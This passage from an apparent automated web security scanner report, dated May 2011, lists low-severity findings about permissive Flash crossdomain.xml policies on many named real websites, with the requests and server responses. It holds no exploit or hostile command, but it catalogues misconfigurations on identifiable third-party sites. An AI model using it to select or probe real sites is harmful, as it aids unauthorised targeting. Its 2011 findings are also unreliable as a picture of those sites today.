<allow-access-from domain="*.ny.publicus.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.pressdemocrat.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false" />
...[SNIP]...

7.255. http://www.gardengatemagazine.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gardengatemagazine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gardengatemagazine.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:01:22 GMT
Server: Apache
Last-Modified: Thu, 26 Feb 2009 16:29:52 GMT
ETag: "e880c8-14a-463d4dc97e000"
Accept-Ranges: bytes
Content-Length: 330
X-Internal-Server: web3
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.gardengatestore.com" />
<allow-access-from domain="*.buysub.com" />
<allow-access-from domain="*.gardengatemagazine.com" />
<allow-access-from domain="*.augusthome.com" />
...[SNIP]...

7.256. http://www.globaltimes.cn/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.globaltimes.cn
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.globaltimes.cn

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 04 May 2011 01:40:08 GMT
Content-Type: text/xml
Content-Length: 515
Last-Modified: Wed, 02 Mar 2011 06:35:23 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.huanqiu.com" />
<allow-access-from domain="*.globaltimes.cn" />
<allow-access-from domain="*.people.com.cn" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.twitter.com" />
<allow-access-from domain="*.myspace.com" />
...[SNIP]...

7.257. http://www.gm.ca/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gm.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gm.ca

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 1434
Content-Type: text/xml
Cache-Control: public,max-age=3600
Last-Modified: Tue, 11 Jan 2011 20:43:51 GMT
ETag: "59a-4d2cc107"
Accept-Ranges: bytes
Date: Wed, 04 May 2011 00:45:45 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.eyereturnmarketing.com"/>
<allow-access-from domain="http://resources.eyereturn.com"/>
<allow-access-from domain="http://testpages.eyereturnmarketing.com"/>
<allow-access-from domain="*.gm.ca"/>
<allow-access-from domain="localhost"/>
<allow-access-from domain="*.testpages.eyereturnmarketing.com"/>
<allow-access-from domain="*.resources.eyereturn.com"/>
<allow-access-from domain="*.eyereturnmarketing.com"/>
<allow-access-from domain="*.vibrantmedia.com"/>
<allow-access-from domain="*.google.ca"/>
<allow-access-from domain="*.theweathernetwork.com"/>
<allow-access-from domain="*.facebook.com"/>
<allow-access-from domain="*.kijiji.ca"/>
<allow-access-from domain="*.msn.com"/>
<allow-access-from domain="*.nhl.com"/>
<allow-access-from domain="*.wheels.ca"/>
<allow-access-from domain="*.sympatico.ca"/>
<allow-access-from domain="*.tsn.ca"/>
<allow-access-from domain="*.yahoo.com"/>
<allow-access-from domain="*.cbc.ca"/>
<allow-access-from domain="*.canada.com"/>
<allow-access-from domain="*.youtube.com"/>
<allow-access-from domain="*.videoegg.com"/>
<allow-access-from domain="*.theglobeandmail.com"/>
<allow-access-from domain="*.cineplex.com"/>
<allow-access-from domain="*.ctv.ca"/>
...[SNIP]...

7.258. http://www.greenvalleyranchresort.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.greenvalleyranchresort.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.greenvalleyranchresort.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:36:14 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 27 Jan 2009 04:03:52 GMT
ETag: "410a8b4-239-f1733a00"
Accept-Ranges: bytes
Content-Length: 569
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...

7.259. http://www.heise.de/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.heise.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.heise.de

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:01:00 GMT
Server: Apache
Last-Modified: Tue, 19 Oct 2010 22:28:53 GMT
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="heise.de" />
<allow-access-from domain="*.heise.de" />
<allow-access-from domain="*.heise-cms.de" />
...[SNIP]...

7.260. http://www.heralddemocrat.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.heralddemocrat.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.heralddemocrat.com

Response

HTTP/1.1 200 OK
Content-Length: 1158
Content-Type: text/xml
Content-Location: http://www.heralddemocrat.com/crossdomain.xml
Last-Modified: Mon, 28 Mar 2011 20:37:52 GMT
Accept-Ranges: bytes
ETag: "31704e288edcb1:0"
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:45:31 GMT
Connection: close
Set-Cookie: NSC_DNTQ-OfxDNT=ffffffff09021f3545525d5f4f58455e445a4a423660;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.mediaspanonline.com" />
<allow-access-from domain="mediaspanonline.com" />
<allow-access-from domain="*.mediaspanonline.com" />
<allow-access-from domain="assets.mediaspanonline.com" />
<allow-access-from domain="*.nassauguardian.net" />
<allow-access-from domain="*.thenassauguardian.net" />
<allow-access-from domain="*.thenassauguardian.com" />
<allow-access-from domain="thenassauguardian.com" />
<allow-access-from domain="thenassauguardian.net" />
<allow-access-from domain="nassauguardian.net" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.cocentral.com" />
<allow-access-from domain="*.mediaspangroup.com" />
<allow-access-from domain="*.mediaspansoftware.com" />
<allow-access-from domain="*.fimc.net" />
<allow-access-from domain="*.firstmediaworks.com" />
<allow-access-from domain="*.firstmediaworks.net" />
<allow-access-from domain="*.firstmediaworks.org" />
...[SNIP]...

7.261. http://www.hihostels.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hihostels.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hihostels.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:16 GMT
Server: Apache
Last-Modified: Thu, 23 Jul 2009 16:07:01 GMT
ETag: "274-46f61ad8c3340"
Accept-Ranges: bytes
Content-Length: 628
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="iyhf.assd.com" secure="false"/>
   <allow-access-from domain="iyhfassd.securesites.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hihostels.com" secure="false"/>
...[SNIP]...

7.262. http://www.holder.com.ua/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.holder.com.ua
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.holder.com.ua

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:06:18 GMT
Server: Apache/1.3.41 (Unix) mod_deflate/1.0.21
Connection: close
Content-Type: text/html; charset=windows-1251

<?xml version="1.0" encoding="UTF-8"?><cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.holder.com.ua" />
...[SNIP]...

7.263. http://www.homeawayrealestate.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.homeawayrealestate.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.homeawayrealestate.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "Hjfxn5kn3/6"
Last-Modified: Tue, 31 Aug 2010 15:52:14 GMT
Content-Type: text/xml; charset=UTF-8
Content-Length: 364
Date: Wed, 04 May 2011 03:36:08 GMT
Set-Cookie: NSC_IBSF_Qfstjtufodf_Hspvq=ffffffffaf141dd945525d5f4f58455e445a4a4229a0;path=/;httponly

<?xml version="1.0"?>
<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.homeawayrealestate.com" to-ports="*" />

...[SNIP]...

7.264. http://www.ifcj.org/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ifcj.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ifcj.org

Response

HTTP/1.1 200 OK
Xet-Cookie:
Age: 1
Date: Wed, 04 May 2011 01:32:43 GMT
Content-Length: 320
Connection: Keep-Alive
Via: NS-CACHE-6.0: 60
ETag: "4c77e92-140-4b797ede"
Server: Apache
Last-Modified: Mon, 15 Feb 2010 17:05:34 GMT
Accept-Ranges: bytes
Keep-Alive: timeout=8, max=496
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*.ifcj.org"/>
   <allow-access-from domain="*.ifcj-digital.org"/>
...[SNIP]...

7.265. http://www.igirlsgames.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.igirlsgames.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.igirlsgames.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:07:41 GMT
Server: Apache
Last-Modified: Sat, 11 Dec 2010 01:22:21 GMT
ETag: "17892cf-10f-497184d6f6d40"
Accept-Ranges: bytes
Content-Length: 271
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.popgals.com" />
<allow-access-from domain="*.hotgamesforgirls.com" />
<allow-access-from domain="*.igirlsgames.com" />
<allow-access-from domain="*.runrungames.com" />
...[SNIP]...

7.266. http://www.jaguar.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.jaguar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jaguar.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"239-1294838382000"
Last-Modified: Wed, 12 Jan 2011 13:19:42 GMT
Content-Type: application/xml;charset=utf-8
Content-Length: 239
Cache-Control: max-age=33206
Expires: Wed, 04 May 2011 12:39:44 GMT
Date: Wed, 04 May 2011 03:26:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="*.jaguar.com" secure="false" to-ports="*"/>
...[SNIP]...

7.267. http://www.journal-news.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.journal-news.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.journal-news.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Length: 115
Content-Type: text/xml
X-N: S
Cache-Control: max-age=59
Date: Wed, 04 May 2011 02:56:49 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.coxnewsweb.com" />
</cross-domain-policy>

7.268. http://www.krcrtv.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.krcrtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.krcrtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
X-IBS-CCDS-VERSION: 2.16.16
X-IBS-CCDS-ORIGIN: origin128
Accept-Ranges: bytes
Content-Length: 132
Content-Type: text/xml
Cache-Control: max-age=72321
Expires: Wed, 04 May 2011 23:13:38 GMT
Date: Wed, 04 May 2011 03:08:17 GMT
Connection: close
Set-Cookie: alpha=5dce8f18a260000021c3c04d271c050000af0000; expires=Sat, 01-May-2021 03:08:17 GMT; path=/; domain=.krcrtv.com

<?xml version="1.0" encoding="utf-8" ?>
   <cross-domain-policy>
       <allow-access-from domain="*.krcrtv.com"/>
   </cross-domain-policy>

7.269. http://www.ktva.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ktva.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ktva.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 01 May 2011 06:47:36 GMT
X-Server-Name: sj-c14-r8-u38-b6
Content-Type: text/xml;charset=utf-8
Date: Wed, 04 May 2011 02:09:42 GMT
Content-Length: 7031
Connection: close
Set-Cookie: click_mobile=0
X-N: S

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.bimtv3.bimedia.net"/>
<allow-access-from domain="*.bimtv.bimedia.net"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*.younewstv.com"/>
<allow-access-from domain="*.broadcast-interactive.com"/>
<allow-access-from domain="*.media.broadcast-interactive.com"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*echo.bimedia.net"/>
<allow-access-from domain="*echo2.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*.2news.tv"/>
<allow-access-from domain="*.aksuperstation.com"/>
<allow-access-from domain="*.belo.com"/>
<allow-access-from domain="*.centralillinoisnewscenter.com"/>
<allow-access-from domain="*.cbs3springfield.com"/>
<allow-access-from domain="*.explorepolitics.com"/>
<allow-access-from domain="*.granitetv.com"/>
<allow-access-from domain="*.indianasnewscenter.com"/>
<allow-access-from domain="*.katu.com"/>
<allow-access-from domain="*.kcby.com"/>
<allow-access-from domain="*.kcrg.com"/>
<allow-access-from domain="*.kens5.com"/>
<allow-access-from domain="*.keprtv.com"/>
<allow-access-from domain="*.keyt.com"/>
<allow-access-from domain="*.kfbb.com"/>
<allow-access-from domain="*.kgw.com"/>
<allow-access-from domain="*.khou.com"/>
<allow-access-from domain="*.kidk.com"/>
<allow-access-from domain="*.kimatv.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.klewtv.com"/>
<allow-access-from domain="*.kmov.com"/>
<allow-access-from domain="*.knin.com"/>
<allow-access-from domain="*.komonews.com"/>
<allow-access-from domain="*.kpic.com"/>
<allow-access-from domain="*.krem.com"/>
<allow-access-from domain="*.ksee24.com"/>
<allow-access-from domain="*.ksbitv.com"/>
<allow-access-from domain="*.ktnv.com"/>
<allow-access-from domain="*.ktvb.com"/>
<allow-access-from domain="*.clickability.com"/>
<allow-access-from domain="*.kval.com"/>
<allow-access-from domain="*.kvi.com"/>
<allow-access-from domain="*.kvue.com"/>
<allow-access-from domain="*.kulr8.com"/>
<allow-access-from domain="*.northlandsnewscenter.com"/>
<allow-access-from domain="*.nwcn.com"/>
<allow-access-from domain="*.star1015.com"/>
<allow-access-from domain="*.tv20detroit.com"/>
<allow-access-from domain="*.wbng.com"/>
<allow-access-from domain="*.wcnc.com"/>
<allow-access-from domain="*.wdtv.com"/>
<allow-access-from domain="*.whas11.com"/>
<allow-access-from domain="*.wkbw.com"/>
<allow-access-from domain="*.wwltv.com"/>
<allow-access-from domain="*.wltz.com"/>
<allow-access-from domain="*.wnky.net"/>
<allow-access-from domain="*.wfaa.com"/>
<allow-access-from domain="*.wvec.com"/>
<allow-access-from domain="*.abc6.com"/>
<allow-access-from domain="*.wktv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.kjzz.com"/>
<allow-access-from domain="*.abcmontana.com"/>
<allow-access-from domain="*.wncftv.com"/>
<allow-access-from domain="*.ugclocal.com"/>
<allow-access-from domain="*.kmvt.com"/>
<allow-access-from domain="*.cnn.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.nbcuxd.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.indiancountrytoday.com"/>
<allow-access-from domain="*.indiancountry.com"/>
<allow-access-from domain="*.pro8news.com"/>
<allow-access-from domain="*.oneidaindiannation.com"/>
<allow-access-from domain="*.oneidanation.net"/>
<allow-access-from domain="*.kofytv.com"/>
<allow-access-from domain="*.wrdetv.com"/>
<allow-access-from domain="*.lively-nation.com"/>
<allow-access-from domain="*.ucdailynews.com"/>
<allow-access-from domain="*.wjys.tv"/>
<allow-access-from domain="*.wavenewspapers.com"/>
<allow-access-from domain="*.wwnytv.com"/>
<allow-access-from domain="*.laindependent.com"/>
<allow-access-from domain="*.fox24.com"/>
<allow-access-from domain="*.cachevalleydaily.com"/>
<allow-access-from domain="bim.images.vidavee.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.sharinghope.tv"/>
<allow-access-from domain="*.azfamily.com"/>
<allow-access-from domain="*.wpsdlocal6.com"/>
<allow-access-from domain="*.bimvid.com"/>
<allow-access-from domain="*.fox11az.com"/>
<allow-access-from domain="*.kissfmnews.com"/>
<allow-access-from domain="*.mychristiantv.net"/>
<allow-access-from domain="*.cheeseheadtalk.com"/>
<allow-access-from domain="*.myfoxmaine.com"/>
<allow-access-from domain="*.foxcharlotte.com"/>
<allow-access-from domain="*.wfrv.com"/>
<allow-access-from domain="*.wfxb.com"/>
<allow-access-from domain="*.newscentralga.com"/>
<allow-access-from domain="*.worcestermag.com"/>
<allow-access-from domain="*.khastv.com"/>
<allow-access-from domain="*.krextv.com"/>
<allow-access-from domain="*.bimlocal.com"/>
<allow-access-from domain="*.foxillinois.com"/>
<allow-access-from domain="*.thetobagonews.com"/>
<allow-access-from domain="*.trinidadexpress.com"/>
<allow-access-from domain="*.reachcaribbean.com"/>
<allow-access-from domain="*.klassicgrenada.com"/>
<allow-access-from domain="*.sixpointtt.com"/>
<allow-access-from domain="*.trinivoices.com"/>
<allow-access-from domain="*.fox50.com"/>
<allow-access-from domain="*.youralaskalink.com"/>
<allow-access-from domain="*.thehomeforinnovation.com"/>
<allow-access-from domain="*.classicrock102.net"/>
<allow-access-from domain="test.library.contentexchange.titantv.com"/>
<allow-access-from domain="*.titantv.com"/>
<allow-access-from domain="*.decisionmark.com"/>
<allow-access-from domain="*.newstalkkcrs.com"/>
<allow-access-from domain="*.1033kissfm.net"/>
<allow-access-from domain="*.mymix1067.com"/>
<allow-access-from domain="*.mycountry961.com"/>
<allow-access-from domain="*.myironmanstory.com"/>
<allow-access-from domain="*.kcwx.com"/>
<allow-access-from domain="*.ncwtv.com"/>
<allow-access-from domain="*.wktctv.com"/>
<allow-access-from domain="*.krbkhd.com"/>
<allow-access-from domain="*.ktva.com"/>
<allow-access-from domain="*.baystateparent.com"/>
<allow-access-from domain="*.itsyourbiz.com"/>
<allow-access-from domain="*.accuweather.com"/>
<allow-access-from domain="*.kmvt-1.com"/>
<allow-access-from domain="*.wbbjtv.com"/>
<allow-access-from domain="*.abccolumbia.com"/>
<allow-access-from domain="*.ntwinecx.com"/>
<allow-access-from domain="*.ntwineapp.com"/>
<allow-access-from domain="*.sbtv.com"/>
<allow-access-from domain="*.allbusiness.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hoovers.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dnb.com" secure="false"/>
...[SNIP]...

7.270. http://www.lastfm.es/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lastfm.es
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lastfm.es

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 22:29:58 GMT
Server: Apache/1.3.39 (Unix)
X-Proxy-Fix-Up: headers fixed up
Last-Modified: Wed, 10 Dec 2008 15:09:07 GMT
ETag: "243f-148-493fdb93"
Accept-Ranges: bytes
Content-Length: 328
Content-Type: application/xml
Age: 15852
X-Cache: HIT from cache4.bra.last.fm
X-Cache-Lookup: HIT from cache4.bra.last.fm:8081
Via: 1.0 cache4.bra.last.fm:8081 (squid/2.7.STABLE7)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.last.fm" secure="false" />
...[SNIP]...
<allow-access-from domain="*.audioscrobbler.com"/>
<allow-access-from domain="87.117.229.54" />
...[SNIP]...

7.271. http://www.lastminutecruises.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lastminutecruises.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lastminutecruises.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 169
Content-Type: text/xml
Last-Modified: Sun, 24 Oct 2010 11:10:18 GMT
Accept-Ranges: bytes
ETag: "92ff5b6c73cb1:2a3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:49:58 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.urlforimages.com" />
</cross-domain-policy>

7.272. http://www.livewellhd.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.livewellhd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

